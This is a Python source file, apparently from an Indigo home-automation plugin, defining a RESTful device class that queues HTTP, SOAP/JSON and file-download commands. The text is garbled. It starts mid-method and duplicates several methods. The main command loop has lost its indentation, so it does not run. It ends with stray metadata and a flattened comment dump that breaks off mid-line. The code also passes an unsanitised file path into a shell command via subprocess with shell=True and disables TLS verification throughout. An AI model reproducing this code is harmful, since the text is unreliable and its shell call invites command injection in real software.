						commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))

		# handle any exceptions that are thrown during execution of the plugin... note that this
		# should terminate the thread, but it may get spun back up again
		except SystemExit:
			pass
		except Exception:
			self.hostPlugin.logger.exception(u'Exception in background processing')
		except:
			# bare except retained: under Python 2, old-style string exceptions
			# would bypass the "except Exception" clause above
			self.hostPlugin.logger.exception(u'Exception in background processing')
		finally:
			self.hostPlugin.logger.debug(u'Command thread ending processing')

	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# This routine should return the HTTP address that will be used to connect to the
	# RESTful device. It may connect via IP address or a host name
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def getRESTfulDeviceAddress(self):
		"""Return the (host, port) pair used to reach the device, or None.

		Must be overridden by concrete device classes; returning None (the base
		behavior) aborts the command processing thread with an error.
		"""
		return None

	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# This routine should be overridden in individual device classes whenever they must
	# handle custom commands that are not already defined
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def handleUnmanagedCommandInQueue(self, deviceHTTPAddress, rpCommand):
		"""Hook for device-specific commands not handled by the framework; no-op here."""
		pass

	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# This routine will be called prior to any network operation to allow the addition
	# of custom headers to the request (does not include file download)
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def addCustomHTTPHeaders(self, httpRequest):
		"""Hook allowing subclasses to mutate the header dict before each request; no-op here."""
		pass

	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# This routine will process any response from the device following the list of
	# response objects defined for this device type. For telnet this will always be
	# a text string
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def handleDeviceTextResponse(self, responseObj, rpCommand):
		"""Match a text response against the device type's response definitions
		and execute the effects of every definition that matches.

		:param responseObj: requests.Response whose .text is evaluated
		:param rpCommand: the RPFrameworkCommand that produced the response
		"""
		# loop through the list of response definitions defined in the (base) class
		# and determine if any match
		responseText = responseObj.text
		for rpResponse in self.hostPlugin.getDeviceResponseDefinitions(self.indigoDevice.deviceTypeId):
			if rpResponse.isResponseMatch(responseText, rpCommand, self, self.hostPlugin):
				self.hostPlugin.logger.threaddebug(u'Found response match: {0}'.format(rpResponse.responseId))
				rpResponse.executeEffects(responseText, rpCommand, self, self.hostPlugin)

	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# This routine will handle an error as thrown by the REST call... it allows
	# descendant classes to do their own processing
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def handleRESTfulError(self, rpCommand, err, response=None):
		"""Log an error raised by a REST/SOAP/JSON call; overridable by descendants.

		:param rpCommand: the command whose execution failed
		:param err: exception instance or status-code string describing the failure
		:param response: the requests.Response received, if any
		"""
		if rpCommand.commandName == CMD_RESTFUL_PUT or rpCommand.commandName == CMD_RESTFUL_GET:
			self.hostPlugin.logger.exception(u'An error occurred executing the GET/PUT request (Device: {0}): {1}'.format(self.indigoDevice.id, err))
		else:
			self.hostPlugin.logger.exception(u'An error occurred processing the SOAP/JSON POST request: (Device: {0}): {1}'.format(self.indigoDevice.id, err))
		if not response is None and not response.text is None:
			self.hostPlugin.logger.debug(RPFrameworkUtils.to_unicode(response.text))

	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	# This routine will handle notification to the device whenever a file was successfully
	# downloaded via a DOWNLOAD_FILE or DOWNLOAD_IMAGE command
	#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def notifySuccessfulDownload(self, rpCommand, outputFileName):
		"""Hook invoked after a successful DOWNLOAD_FILE/DOWNLOAD_IMAGE save; no-op here."""
		pass
#=========================================================================================
# File boundary: Network Remote.indigoPlugin/Contents/Server Plugin/RPFramework/RPFrameworkRESTfulDevice.py
#=========================================================================================
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice by RogueProeliator <<EMAIL>>
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Python imports
#/////////////////////////////////////////////////////////////////////////////////////////
import functools
import httplib
import indigo
import Queue
import os
import re
import string
import subprocess
import sys
import threading
import telnetlib
import time
import urllib
import urllib2
from urlparse import urlparse
import requests
from requests.auth import HTTPDigestAuth
import RPFrameworkPlugin
import RPFrameworkCommand
import RPFrameworkDevice
import RPFrameworkNetworkingWOL
import RPFrameworkUtils
#/////////////////////////////////////////////////////////////////////////////////////////
# Constants and configuration variables
#/////////////////////////////////////////////////////////////////////////////////////////
# Command names understood by the RESTful device's processing queue; payload
# formats for each are documented in concurrentCommandProcessingThread below.
CMD_RESTFUL_PUT = u'RESTFUL_PUT'
CMD_RESTFUL_GET = u'RESTFUL_GET'
CMD_SOAP_REQUEST = u'SOAP_REQUEST'
CMD_JSON_REQUEST = u'JSON_REQUEST'
CMD_DOWNLOADFILE = u'DOWNLOAD_FILE'
CMD_DOWNLOADIMAGE = u'DOWNLOAD_IMAGE'
# Keys used to read device-type configuration values via hostPlugin.getGUIConfigValue
GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY = u'updateStatusPollerIntervalProperty'
GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID = u'updateStatusPollerActionId'
GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY = u'updateStatusPollerStartupDelay'
GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES = u'emptyQueueReducedWaitCycles'
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
class RPFrameworkRESTfulDevice(RPFrameworkDevice.RPFrameworkDevice):
#/////////////////////////////////////////////////////////////////////////////////////
# Class construction and destruction methods
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Constructor called once upon plugin class receiving a command to start device
# communication. Defers to the base class for processing but initializes params
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	def __init__(self, plugin, device):
		"""Initialize the device; all setup is deferred to the RPFrameworkDevice base."""
		super(RPFrameworkRESTfulDevice, self).__init__(plugin, device)
#/////////////////////////////////////////////////////////////////////////////////////
# Processing and command functions
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine is designed to run in a concurrent thread and will continuously monitor
# the commands queue for work to do.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def concurrentCommandProcessingThread(self, commandQueue):
try:
self.hostPlugin.logger.debug(u'Concurrent Processing Thread started for device {0}'.format(self.indigoDevice.id))
# obtain the IP or host address that will be used in connecting to the
# RESTful service via a function call to allow overrides
deviceHTTPAddress = self.getRESTfulDeviceAddress()
if deviceHTTPAddress is None:
self.hostPlugin.logger.error(u'No IP address specified for device {0}; ending command processing thread.'.format(self.indigoDevice.id))
return
# retrieve any configuration information that may have been setup in the
# plugin configuration and/or device configuration
updateStatusPollerPropertyName = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY, u'updateInterval')
updateStatusPollerInterval = int(self.indigoDevice.pluginProps.get(updateStatusPollerPropertyName, u'90'))
updateStatusPollerNextRun = None
updateStatusPollerActionId = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID, u'')
emptyQueueReducedWaitCycles = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES, u'80'))
# begin the infinite loop which will run as long as the queue contains commands
# and we have not received an explicit shutdown request
continueProcessingCommands = True
lastQueuedCommandCompleted = 0
while continueProcessingCommands == True:
# process pending commands now...
while not commandQueue.empty():
lenQueue = commandQueue.qsize()
self.hostPlugin.logger.threaddebug(u'Command queue has {0} command(s) waiting'.format(lenQueue))
# the command name will identify what action should be taken... we will handle the known
# commands and dispatch out to the device implementation, if necessary, to handle unknown
# commands
command = commandQueue.get()
if command.commandName == RPFrameworkCommand.CMD_INITIALIZE_CONNECTION:
# specialized command to instanciate the concurrent thread
# safely ignore this... just used to spin up the thread
self.hostPlugin.logger.threaddebug(u'Create connection command de-queued')
# if the device supports polling for status, it may be initiated here now; however, we should implement a pause to ensure that
# devices are created properly (RESTFul devices may respond too fast since no connection need be established)
statusUpdateStartupDelay = float(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY, u'3'))
if statusUpdateStartupDelay > 0.0:
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=str(statusUpdateStartupDelay)))
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))
elif command.commandName == RPFrameworkCommand.CMD_TERMINATE_PROCESSING_THREAD:
# a specialized command designed to stop the processing thread indigo
# the event of a shutdown
continueProcessingCommands = False
elif command.commandName == RPFrameworkCommand.CMD_PAUSE_PROCESSING:
# the amount of time to sleep should be a float found in the
# payload of the command
try:
pauseTime = float(command.commandPayload)
self.hostPlugin.logger.threaddebug(u'Initiating sleep of {0} seconds from command.'.format(pauseTime))
time.sleep(pauseTime)
except:
self.hostPlugin.logger.warning(u'Invalid pause time requested')
elif command.commandName == RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL:
# this command instructs the plugin to update the full status of the device (all statuses
# that may be read from the device should be read)
if updateStatusPollerActionId != u'':
self.hostPlugin.logger.debug(u'Executing full status update request...')
self.hostPlugin.executeAction(None, indigoActionId=updateStatusPollerActionId, indigoDeviceId=self.indigoDevice.id, paramValues=None)
updateStatusPollerNextRun = time.time() + updateStatusPollerInterval
else:
self.hostPlugin.logger.threaddebug(u'Ignoring status update request, no action specified to update device status')
elif command.commandName == RPFrameworkCommand.CMD_NETWORKING_WOL_REQUEST:
# this is a request to send a Wake-On-LAN request to a network-enabled device
# the command payload should be the MAC address of the device to wake up
try:
RPFrameworkNetworkingWOL.sendWakeOnLAN(command.commandPayload)
except:
self.hostPlugin.logger.error(u'Failed to send Wake-on-LAN packet')
elif command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_RESTFUL_PUT or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
try:
self.hostPlugin.logger.debug(u'Processing GET operation: {0}'.format(command.commandPayload))
# gather all of the parameters from the command payload
# the payload should have the following format:
# [0] => request method (http|https|etc.)
# [1] => path for the GET operation
# [2] => authentication type: none|basic|digest
# [3] => username
# [4] => password
#
# CMD_DOWNLOADFILE or CMD_DOWNLOADIMAGE
# [5] => download filename/path
# [6] => image resize width
# [7] => image resize height
#
# CMD_RESTFUL_PUT
# [5] => data to post as the body (if any, may be blank)
commandPayloadList = command.getPayloadAsList()
fullGetUrl = commandPayloadList[0] + u'://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_unicode(deviceHTTPAddress[1]) + commandPayloadList[1]
self.hostPlugin.logger.threaddebug(u'Full URL for GET: {0}'.format(fullGetUrl))
customHeaders = {}
self.addCustomHTTPHeaders(customHeaders)
authenticationParam = None
authenticationType = u'none'
username = u''
password = u''
if len(commandPayloadList) >= 3:
authenticationType = commandPayloadList[2]
if len(commandPayloadList) >= 4:
username = commandPayloadList[3]
if len(commandPayloadList) >= 5:
password = commandPayloadList[4]
if authenticationType != 'none' and username != u'':
self.hostPlugin.logger.threaddebug(u'Using login credentials... Username=> {0}; Password=>{1} <PASSWORD>'.format(username, len(password)))
if authenticationType.lower() == 'digest':
self.hostPlugin.logger.threaddebug(u'Enabling digest authentication')
authenticationParam = HTTPDigestAuth(username, password)
else:
authenticationParam = (username, password)
# execute the URL fetching depending upon the method requested
if command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
responseObj = requests.get(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False)
elif command.commandName == CMD_RESTFUL_PUT:
dataToPost = None
if len(commandPayloadList) >= 6:
dataToPost = commandPayloadList[5]
responseObj = requests.post(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False, data=dataToPost)
# if the network command failed then allow the error processor to handle the issue
if responseObj.status_code == 200:
# the response handling will depend upon the type of command... binary returns must be
# handled separately from (expected) text-based ones
if command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
# this is a binary return that should be saved to the file system without modification
if len(commandPayloadList) >= 6:
saveLocation = commandPayloadList[5]
# execute the actual save from the binary response stream
try:
localFile = open(RPFrameworkUtils.to_str(saveLocation), "wb")
localFile.write(responseObj.content)
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] -=- binary data written to {1}-=-'.format(responseObj.status_code, saveLocation))
if command.commandName == CMD_DOWNLOADIMAGE:
imageResizeWidth = 0
imageResizeHeight = 0
if len(command.commandPayload) >= 7:
imageResizeWidth = int(command.commandPayload[6])
if len(command.commandPayload) >= 8:
imageResizeHeight = int(command.commandPayload[7])
resizeCommandLine = u''
if imageResizeWidth > 0 and imageResizeHeight > 0:
# we have a specific size as a target...
resizeCommandLine = u'sips -z {0} {1} {2}'.format(imageResizeHeight, imageResizeWidth, saveLocation)
elif imageResizeWidth > 0:
# we have a maximum size measurement
resizeCommandLine = u'sips -Z {0} {1}'.format(imageResizeWidth, saveLocation)
# if a command line has been formed, fire that off now...
if resizeCommandLine == u'':
self.hostPlugin.logger.debug(u'No image size specified for {0}; skipping resize.'.format(saveLocation))
else:
self.hostPlugin.logger.threaddebug(u'Executing resize via command line "{0}"'.format(resizeCommandLine))
try:
subprocess.Popen(resizeCommandLine, shell=True)
self.hostPlugin.logger.debug(u'{0} resized via sip shell command'.format(saveLocation))
except:
self.hostPlugin.logger.error(u'Error resizing image via sips')
# we have completed the download and processing successfully... allow the
# device (or its descendants) to process successful operations
self.notifySuccessfulDownload(command, saveLocation)
finally:
if not localFile is None:
localFile.close()
else:
self.hostPlugin.logger.error(u'Unable to complete download action - no filename specified')
else:
# handle this return as a text-based return
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
self.handleDeviceTextResponse(responseObj, command)
self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))
elif responseObj.status_code == 401:
self.handleRESTfulError(command, u'401 - Unauthorized', responseObj)
else:
self.handleRESTfulError(command, str(responseObj.status_code), responseObj)
except Exception as e:
# the response value really should not be defined here as it bailed without
# catching any of our response error conditions
self.handleRESTfulError(command, e, None)
elif command.commandName == CMD_SOAP_REQUEST or command.commandName == CMD_JSON_REQUEST:
responseObj = None
try:
# this is to post a SOAP request to a web service... this will be similar to a restful put request
# but will contain a body payload
self.hostPlugin.logger.threaddebug(u'Received SOAP/JSON command request: {0}'.format(command.commandPayload))
soapPayloadParser = re.compile(r"^\s*([^\n]+)\n\s*([^\n]+)\n(.*)$", re.DOTALL)
soapPayloadData = soapPayloadParser.match(command.commandPayload)
soapPath = soapPayloadData.group(1).strip()
soapAction = soapPayloadData.group(2).strip()
soapBody = soapPayloadData.group(3).strip()
fullGetUrl = u'http://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_str(deviceHTTPAddress[1]) + RPFrameworkUtils.to_str(soapPath)
self.hostPlugin.logger.debug(u'Processing SOAP/JSON operation to {0}'.format(fullGetUrl))
customHeaders = {}
self.addCustomHTTPHeaders(customHeaders)
if command.commandName == CMD_SOAP_REQUEST:
customHeaders["Content-type"] = "text/xml; charset=\"UTF-8\""
customHeaders["SOAPAction"] = RPFrameworkUtils.to_str(soapAction)
else:
customHeaders["Content-type"] = "application/json"
# execute the URL post to the web service
self.hostPlugin.logger.threaddebug(u'Sending SOAP/JSON request:\n{0}'.format(soapBody))
self.hostPlugin.logger.threaddebug(u'Using headers: \n{0}'.format(customHeaders))
responseObj = requests.post(fullGetUrl, headers=customHeaders, verify=False, data=RPFrameworkUtils.to_str(soapBody))
if responseObj.status_code == 200:
# handle this return as a text-based return
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
self.handleDeviceTextResponse(responseObj, command)
self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))
else:
self.hostPlugin.logger.threaddebug(u'Command Response was not HTTP OK, handling RESTful error')
self.handleRESTfulError(command, str(responseObj.status_code), responseObj)
except Exception as e:
self.handleRESTfulError(command, e, responseObj)
else:
# this is an unknown command; dispatch it to another routine which is
# able to handle the commands (to be overridden for individual devices)
self.handleUnmanagedCommandInQueue(deviceHTTPAddress, command)
# if the command has a pause defined for after it is completed then we
# should execute that pause now
if command.postCommandPause > 0.0 and continueProcessingCommands == True:
self.hostPlugin.logger.threaddebug(u'Post Command Pause: {0}'.format(command.postCommandPause))
time.sleep(command.postCommandPause)
# complete the dequeuing of the command, allowing the next
# command in queue to rise to the top
commandQueue.task_done()
lastQueuedCommandCompleted = emptyQueueReducedWaitCycles
# when the queue is empty, pause a bit on each iteration
if continueProcessingCommands == True:
# if we have just completed a command recently, half the amount of
# wait time, assuming that a subsequent command could be forthcoming
if lastQueuedCommandCompleted > 0:
time.sleep(self.emptyQueueProcessingThreadSleepTime/2)
lastQueuedCommandCompleted = lastQueuedCommandCompleted - 1
else:
time.sleep(self.emptyQueueProcessingThreadSleepTime)
# check to see if we need to issue an update...
if updateStatusPollerNextRun is not None and time.time() > updateStatusPollerNextRun:
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))
# handle any exceptions that are thrown during execution of the plugin... note that this
# should terminate the thread, but it may get spun back up again
except SystemExit:
pass
except Exception:
self.hostPlugin.logger.exception(u'Exception in background processing')
except:
self.hostPlugin.logger.exception(u'Exception in background processing')
finally:
self.hostPlugin.logger.debug(u'Command thread ending processing')
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine should return the HTTP address that will be used to connect to the
# RESTful device. It may connect via IP address or a host name
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def getRESTfulDeviceAddress(self):
    """Return the address used to connect to the RESTful device.

    Base implementation returns None; concrete device classes must
    override this to supply the address (the command thread treats the
    value as a (host, port)-style indexable — TODO confirm exact shape
    against the thread code that reads deviceHTTPAddress[0]/[1]).
    """
    return None
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine should be overridden in individual device classes whenever they must
# handle custom commands that are not already defined
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleUnmanagedCommandInQueue(self, deviceHTTPAddress, rpCommand):
    """Hook for commands not handled by the framework's command loop.

    Base implementation does nothing; device subclasses override this to
    process their own custom command names.
    """
    pass
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will be called prior to any network operation to allow the addition
# of custom headers to the request (does not include file download)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def addCustomHTTPHeaders(self, httpRequest):
    """Hook called before network operations so subclasses can add custom
    HTTP headers; httpRequest is the mutable headers dict to extend.
    Base implementation adds nothing. (Not invoked for file downloads.)
    """
    pass
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will process any response from the device following the list of
# response objects defined for this device type. For telnet this will always be
# a text string
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleDeviceTextResponse(self, responseObj, rpCommand):
    """Run a text response through the device type's response definitions.

    Each definition that matches the response text has its effects
    executed against this device.
    """
    plugin = self.hostPlugin
    responseText = responseObj.text
    for definition in plugin.getDeviceResponseDefinitions(self.indigoDevice.deviceTypeId):
        if not definition.isResponseMatch(responseText, rpCommand, self, plugin):
            continue
        plugin.logger.threaddebug(u'Found response match: {0}'.format(definition.responseId))
        definition.executeEffects(responseText, rpCommand, self, plugin)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will handle an error as thrown by the REST call... it allows
# descendant classes to do their own processing
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleRESTfulError(self, rpCommand, err, response=None):
    """Log an error raised during a RESTful (GET/PUT) or SOAP/JSON (POST)
    operation; descendant classes may override for custom processing.
    """
    logger = self.hostPlugin.logger
    if rpCommand.commandName in (CMD_RESTFUL_PUT, CMD_RESTFUL_GET):
        logger.exception(u'An error occurred executing the GET/PUT request (Device: {0}): {1}'.format(self.indigoDevice.id, err))
    else:
        logger.exception(u'An error occurred processing the SOAP/JSON POST request: (Device: {0}): {1}'.format(self.indigoDevice.id, err))
    # If the server returned a body, dump it at debug level to aid diagnosis.
    if response is not None and response.text is not None:
        logger.debug(RPFrameworkUtils.to_unicode(response.text))
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will handle notification to the device whenever a file was successfully
# downloaded via a DOWNLOAD_FILE or DOWNLOAD_IMAGE command
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def notifySuccessfulDownload(self, rpCommand, outputFileName):
    """Hook invoked after a DOWNLOAD_FILE / DOWNLOAD_IMAGE command has
    saved (and, for images, optionally resized) the file at
    outputFileName. Base implementation does nothing; subclasses may
    override to react to completed downloads.
    """
    pass
|
en
| 0.515262
|
#! /usr/bin/env python # -*- coding: utf-8 -*- #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # RPFrameworkRESTfulDevice by RogueProeliator <<EMAIL>> # This class is a concrete implementation of the RPFrameworkDevice as a device which # communicates via a REST style HTTP connection. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # Python imports #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # Constants and configuration variables #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// # RPFrameworkRESTfulDevice # This class is a concrete implementation of the RPFrameworkDevice as a device which # communicates via a REST style HTTP connection. 
#///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////////// #///////////////////////////////////////////////////////////////////////////////////// # Class construction and destruction methods #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Constructor called once upon plugin class receiving a command to start device # communication. Defers to the base class for processing but initializes params #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #///////////////////////////////////////////////////////////////////////////////////// # Processing and command functions #///////////////////////////////////////////////////////////////////////////////////// #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine is designed to run in a concurrent thread and will continuously monitor # the commands queue for work to do. #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # obtain the IP or host address that will be used in connecting to the # RESTful service via a function call to allow overrides # retrieve any configuration information that may have been setup in the # plugin configuration and/or device configuration # begin the infinite loop which will run as long as the queue contains commands # and we have not received an explicit shutdown request # process pending commands now... # the command name will identify what action should be taken... 
we will handle the known # commands and dispatch out to the device implementation, if necessary, to handle unknown # commands # specialized command to instanciate the concurrent thread # safely ignore this... just used to spin up the thread # if the device supports polling for status, it may be initiated here now; however, we should implement a pause to ensure that # devices are created properly (RESTFul devices may respond too fast since no connection need be established) # a specialized command designed to stop the processing thread indigo # the event of a shutdown # the amount of time to sleep should be a float found in the # payload of the command # this command instructs the plugin to update the full status of the device (all statuses # that may be read from the device should be read) # this is a request to send a Wake-On-LAN request to a network-enabled device # the command payload should be the MAC address of the device to wake up # gather all of the parameters from the command payload # the payload should have the following format: # [0] => request method (http|https|etc.) # [1] => path for the GET operation # [2] => authentication type: none|basic|digest # [3] => username # [4] => password # # CMD_DOWNLOADFILE or 